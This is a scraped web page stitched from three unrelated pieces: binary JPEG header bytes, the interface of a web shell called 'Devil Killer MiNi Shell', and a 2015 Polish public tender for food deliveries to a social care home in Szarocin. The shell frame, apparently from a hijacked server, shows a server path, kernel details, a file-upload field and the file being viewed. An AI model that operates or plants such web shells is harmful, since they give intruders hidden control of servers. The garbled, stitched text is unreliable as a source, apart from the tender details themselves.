JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20151013/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20151013/270548-N-2015.html

<p class="kh_header"><b>Kamienna Góra: Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie</b><br>
<b>Numer ogłoszenia: 270548 - 2015; data zamieszczenia: 13.10.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej w Szarocinie , Szarocin 1, 58-400 Kamienna Góra, woj. dolnośląskie, tel. 0-75 742 44 20, faks 0-75 742 44 20.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.dpsszarocin.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa samorządu terytorialnego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie.
2. Przedmiot zamówienia podzielony został na siedem części:
Część 1 Artykuły spożywcze różne
Część 2 Nabiał i mleko
Część 3 Pieczywo
Część 4 Warzywa i owoce
Część 5 Mięso i wyroby wędliniarskie
Część 6 Ryby, mrożonki i przetwory warzywno - owocowe
Część 7 Jaja
3. Szczegółowe zestawienie asortymentowe zamawianych artykułów żywnościowych zawarte w opisie poszczególnych części.
4. Użyte  nazwy własne (towaru lub producenta) oznaczają, iż oferowany artykuł powinien być równoważy do wskazanych, tzn. powinien posiadać porównywalną wartość odżywczą i energetyczną oraz zawartość składników, a także posiadać nie gorsze cechy jakościowe w zakresie wydajności oraz zbliżone walory smakowe.
5. Zamawiający na bazie doświadczeń z lat ubiegłych oszacował zapotrzebowanie na wymienione artykuły na okres 12 miesięcy. Ilości te (podane w załącznikach) stanowią wartość szacunkową, co oznacza, że ostateczna ilość zamawiana na podstawie umowy może ulec zmianie.
6. Dostawy artykułów żywnościowych odbywać się będą w dni robocze od poniedziałku do soboty, za wyjątkiem dni ustawowo wolnych od pracy, w godzinach od 6°° do godziny 13°°. Miejscem dostawy jest siedziba Zamawiającego (Pałac- kuchnia).
7. Zamawiający będzie zamawiał wyroby sukcesywnie, w miarę potrzeb - od poniedziałku do piątku za wyjątkiem dni ustawowo wolnych od pracy w godzinach od 7°°do godziny 13°°.
8. Dostawy realizowane będą w partiach, na podstawie zamówień składanych przez Zamawiającego z jednodniowym wyprzedzeniem w formie pisemnej (faksem) lub telefonicznej. W zamówieniu Zamawiający każdorazowo określi ilość i rodzaj zamawianego asortymentu.
9. Częstotliwość składanych zamówień uzależniona będzie od bieżących potrzeb Zamawiającego i zamawianego asortymentu. Szacuje się, że będzie ona średnio wynosiła: dla części 1, 4, 7 - jeden raz w tygodniu, dla części 5 - dwa razy w tygodniu, dla części 2 - 3 razy w tygodniu, dla części 3 - 6 razy w tygodniu i dla części 6 - wg zapotrzebowania.
10. Dostarczane artykuły żywnościowe będące przedmiotem umowy muszą być:
świeże, bardzo dobrej jakości i spełniać wszystkie obowiązujące w tym zakresie normy;
dostarczane w oryginalnych opakowaniach producenta, z etykietą handlową identyfikującą dany artykuł i z podanym na etykiecie terminem przydatności do spożycia (nie dotyczy warzyw i owoców);
dostarczane środkiem transportu spełniającym wymagania sanitarne dotyczące środków transportu żywności.
11. Podana w załącznikach waga (gramatura) dotyczy pojedynczego opakowania danego artykułu. Artykuły, dla których określono wagę opakowań nie mogą być dostarczane luzem.
12. Artykuły spożywcze powinny posiadać odpowiednio długie okresy (terminy) przydatności do spożycia, stosownie do rodzaju asortymentu.
13. W przypadku wykrycia wad zamówionych artykułów spożywczych lub ich niezgodności asortymentowej i ilościowej ze złożonym zamówieniem, Zamawiającemu przysługuje prawo złożenia reklamacji. W przypadku złożenia uzasadnionej reklamacji, Wykonawca zobowiązany jest wymienić niezwłocznie i na własny koszt towar wadliwy na wolny od wad i/lub dostarczyć (uzupełnić) asortyment i ilości zgodnie z zamówieniem.
14. Reklamacje mogą być zgłaszane telefonicznie lub pisemnie przez przedstawicieli Zamawiającego wymienionych w umowie. W przypadku pisemnego zgłoszenia reklamacji, Wykonawca zobowiązany jest również pisemnie potwierdzić fakt jej przyjęcia.
15. W przypadku wystąpienia trzech udokumentowanych reklamacji, Zamawiający ma prawo do rozwiązania umowy ze skutkiem natychmiastowym.
16. W przypadku, gdy Wykonawca nie dostarczy przedmiotu umowy w ustalonych terminach lub gdy wskutek reklamacji nie dokona niezwłocznej wymiany towaru wadliwego na wolny od wad i/lub uzupełnienia asortymentu i ilości, Zamawiający ma prawo dokonać zakupu u innego dostawcy w asortymencie i ilościach odpowiadających niezrealizowanej/niewymienionej dostawie, co będzie skutkować zmniejszeniem ilości przedmiotu umowy o wielkość tego zakupu. 
17. W przypadku zaistnienia sytuacji określonej w pkt 16, Wykonawca zobowiązany będzie do zwrotu Zamawiającemu kwoty wynikającej z różnicy pomiędzy ceną zakupu a ceną wynikającą z umowy, po uprzednim przesłaniu do Wykonawcy kopii faktury zakupu danego asortymentu.
18. Do obowiązków Wykonawcy, który złoży ofertę najkorzystniejszą na Część 6. Ryby, mrożonki i przetwory warzywno - owocowe, należeć będzie nieodpłatne wyposażenie Zamawiającego w 4 szt. zamrażarek, każda o pojemności 350 litrów - na czas trwania umowy. Powyższe winno być wkalkulowane w cenę oferty..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2, 15.50.00.00-3, 15.81.10.00-6, 15.30.00.00-1, 15.11.00.00-2, 15.12.00.00-8, 15.20.00.00-0, 03.14.25.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium od Wykonawców ubiegających się o udzielenie niniejszego zamówienia publicznego</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.dpsszarocin.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dom Pomocy Społecznej w Szarocinie, Szarocin 1, 58-400 Kamienna Góra sekretariat.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.10.2015 godzina 09:45, miejsce: Domu Pomocy Społecznej w Szarocinie, Szarocin 1, 58-400 Kamienna Góra, wyłącznie w sekretariacie (II piętro) lub listownie/przesyłką na adres Zamawiającego.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Artykuły spożywcze różne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Makaron nitki 250g (4 jajeczny)  200kg;
2 Makaron świderki po 2,5kg  500kg;
3 Makaron kolanka po 2,5kg  500kg;
4 Makaron spaghetti po 400g  50kg;
5 Woda mineralna gazowana butelki 0,5l  300l;
6 Woda mineralna gazowana butelki 1,5l  1200l;
7 Woda mineralna niegazowana butelki 0,5l 150l;
8 Woda mineralna niegazowana butelki po 1,5l 300l;
9 Sól po 1kg 800l;
10 Pasztet z drobiu 160g (typu prochowicki) 300kg;
11 Pasztet z drobiu 300g (typu prochowicki) 200kg;
12 Konserwy mięsne wieprzowe 300g 200kg;
13 Pasztet wieprzowy 500g 100kg;
14 Ogórek konserwowy po 900g  150kg;
15 Mąka pszenna typ 500 po 1kg  600kg;
16 Mąka tortowa typ 450 po 1kg  600kg;
17 Mąka krupczatka po 1kg  10kg;
18 Mąka ziemniaczana po 1kg  100kg;
19 Kasza manna po 1kg  180kg;
20 Kasza jęczmienna po 1kg  300kg;
21 Kasza kukurydziana po 0,5kg  100kg;
22 Cukier (wyrób polski  Kategoria I po 1kg)  4000kg;
23 Cukier puder po 0,5kg  30kg;
24 Groszek konserwowy po 400g  200kg;
25 Chrzan konserwowy tarty po 280g  100kg;
26 Musztarda po 1 kg 150kg;
27 Ocet po 1l  100l;
28 Olej roślinny (opak. 1l)  250l;
29 Olej roślinny (opak. 3l)  120l;
30 Olej słonecznikowy (opak. 1l)  90l;
31 Olej z oliwek (opak. 0,5l)  15l;
32 Miód naturalny po 900g  PSZCZELI  80kg;
33 Krem czekoladowy po 400g  150kg;
34 Dżemy po 280g  250kg;
35 Powidła śliwkowe po 300g  200kg;
36 Marmolada wieloowocowa po 1kg  200kg;
37 Masa makowa po 850g  40kg;
38 Brzoskwinie w puszce po 850g  20kg;
39 Wiórki kokosowe po 100g  10kg;
40 Rodzynki po 500g  15kg;
41 Cukier waniliowy po 1kg  5kg;
42 Cynamon po 1kg  3kg;
43 Kwasek cytrynowy po 1kg  5kg;
44 Proszek do pieczenia po 1kg  5kg;
45 Żelatyna  po 1kg  10kg;
46 Konserwa śledź w pomidorach 170g  20kg;
47 Konserwa śledź w oleju 170g  20kg;
48 Konserwa szprot w pomidorach 170 g 	20kg;
49 Konserwa makrela w pomidorach po 170g  30kg;
50 Konserwa makrela w oleju po 170g  20kg;
51 Konserwa szprot podwędzany po 170g 	30kg;
52 Ryż po 1kg 	800kg;
53 Pieczarki marynowane po 850g	 85kg;
54 Płatki kukurydziane po 500g  150kg;
55 Płatki owsiane błyskawiczne po 400g  60kg;
56 Płatki jęczmienne błyskawiczne po 400g  60kg;
57 Ananasy w puszce po 500g  40kg;
58 Napoje owocowe różne gazowane po 1,5l 200szt.;
59 Napoje owocowe różne niegazowane po 1,5l  200szt.;
60 Aromaty do ciast różne po 9ml  60szt.;
61 Soda oczyszczona po 500g  5kg;
62 Wafle suche tortowe po 150g  100szt.;
63 Majonez po 900g typu Świdnicki  200kg;
64 Majonez 700g typu Winiary  250kg;
65 Oranżada różna po 1,5l  300szt.;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.60.00.00-4, 15.40.00.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Nabiał i mleko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Ser biały półtłusty 450kg;
2 Ser biały chudy 100kg;
3 Ser topiony 350kg;
4 Ser topiony wędzony z szynką	30kg;
5 Ser topiony wędzony	30kg;
6 Serek homogenizowany po 150g typu Danio 250kg;
7 Śmietana 18% po 200g	200kg;
8 Śmietana 30% po 200g	550kg;
9 Jogurt owocowy po 115g typu Danon 3000szt.;
10 Jogurt naturalny po 180g typu ZOTT	1000szt.;
11 Jogurt owocowy po 150g typu Jogobella 1500szt.;
12 Masło extra (osełka po 100g) 350kg;
13 Masło smakowe typu smaksełko po 100g	100kg;
14 Margaryna do smarowania pieczywa typu DELMA	1800kg;
15 Ser żółty (typu gouda) 150kg;
16 Ser żółty (typu salami) 100kg;
17 Ser żółty typu dziurawiec 100kg;
18 Ser żółty typu morski 100kg;
19 Ser żółty EDAMSKI 100kg
20 Ser żółty dziurawiec typu RYDZKI 150kg;
21 Ser żółty typu rolada ustrzycka 60kg;
22 Ser żółty wędzony	60kg;
23 Margaryna do pieczenia typu KASIA	200kg;
24 Margaryna mleczna	200kg;
25 Mleko 8500l;
26 Maślanka  400g 300szt.;
27 Kefir  380g	700szt.;
28 Kefir po 200g 700szt.;
29 Serek wiejski 150g	90kg;
30 Serek kanapkowy po 150g 600szt.;
31 Serek typu mój ulubiony po 450g 180kg;
32 Deser ryżowy po 150g	 150szt.;
33 Deser z musli po 150g 150szt.;
34 Deser kaszka po 150g	150szt.;
35 Deser serniczek po 150g 150szt.;
36 Deser czekoladowy po 150g	150szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Pieczywo.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocini, jak poniżej:
1 Chleb zwykły krojony	7000kg;
2 Bułka pszenna wrocławska 3500kg;
3 Bułka mała pszenne po 50g	5000szt.;
4 Bułka duża pszenna po 90g	13000szt.;
5 Bułka tarta	200kg;
6 Chleb ciemny razowy krojony po 500g	200kg;
7 Chleb pełnoziarnisty krojony po 500g	200kg;
8 Chleb słonecznikowy krojony po 500g	200kg;
9 Chleb orkiszowy krojony po 500g	150kg;
10 Chleb dla diabetyków krojony po 500g	150kg;
11 Bułka słodka z serem	900szt.;
12 Bułka słodka z marmoladą	800szt.;
13 Bułka słodka z jagodami	800szt.;
14 Bułka razowa	300szt.;
15 Pączki z marmoladą	200szt.;
16 Pączki z nadzieniem różanym	200szt.;
17 Pączki z nadzieniem budyniowym 200szt.;
18 Pączki z nadzieniem ajerkoniak 200szt.;
19 Rogal zwykły po 90g	6000szt.;
20 Rogal maślany po 30g	1400szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Warzywa i owoce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Burak czerwony 800kg;
2 Cebula 650kg;
3 Cebula czerwona 100kg;
4 Marchew 1300kg;
5 Seler	100kg;
6 Ziemniaki młode 5000kg;
7 Ziemniaki 9000kg;
8 Ogórek świeży	1500kg;
9 Ogórek kiszony 170kg;
10 Kapusta pekińska 200kg;
11 Kapusta kiszona 500kg;
12 Kapusta biała młoda 500szt.;
13 Kapusta biała 500kg;
14 Kapusta włoska 30szt.;
15 Kapusta czerwona 200kg;
16 Sałata zielona 1000szt.;
17 Kalafior świeży 200szt.;
18 Koper świeży	1000 pęczek;
19 Koper do kiszenia	50szt.;
20 Pietruszka natka świeża 1000	pęczek;
21 Jabłka 1900kg;
22 Pomidory świeże 1400kg;
23 Pomidor malinowy 600kg;
24 Szczypior 800 pęczek;
25 Czosnek krajowy 400szt.;
26 Pietruszka korzeń 100kg;
27 Por	50kg;
28 Seler 100kg;
29 Cytryny 480kg;
30 Groch łuskany po 5kg	280kg;
31 Fasola Jasiek po 500g 50kg;
32 Orzech włoski łuskany 5kg;
33 Rzodkiewka	1000 pęczek;
34 Rabarbar	50kg;
35 Botwina	200szt.;
36 Brokuł	100szt.;
37 Fasolka szparagowa żółta	100kg;
38 Fasolka szparagowa zielona	100kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Mięso i wyroby wędliniarskie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa żywności na potrzeby Domu Pomocy Społecznej w Szarocinie, jak poniżej:
1 Filet z piersi kurczaka 300kg;
2 Skrzydełko z kurczaka	100kg;
3 Porcja rosołowa z kurczaka	1200kg;
4 Kurczak świeży	300kg;
5 Udziec z indyka bk	150kg;
6 Wątroba wieprzowa	150kg;
7 Wołowina - pręga bk	70kg;
8 Wołowina - ligawa bk	70kg;
9 Wieprzowina - golonka tylna	100kg;
10 Wieprzowina - szynka bk	350kg;
11 Wieprzowina - łopatka bk i bez tłuszczu 350kg;
12 Wieprzowina - karkówka bk	250kg;
13 Wieprzowina - biodrówka bk	100kg;
14 Wieprzowina - pachwina	50kg;
15 Wieprzowina - nóżki	60kg;
16 Wieprzowina - przedgolonki	50kg;
17 Żeberka wieprzowe trójkąty	100kg;
18 Wieprzowina - kości schabowe	200kg;
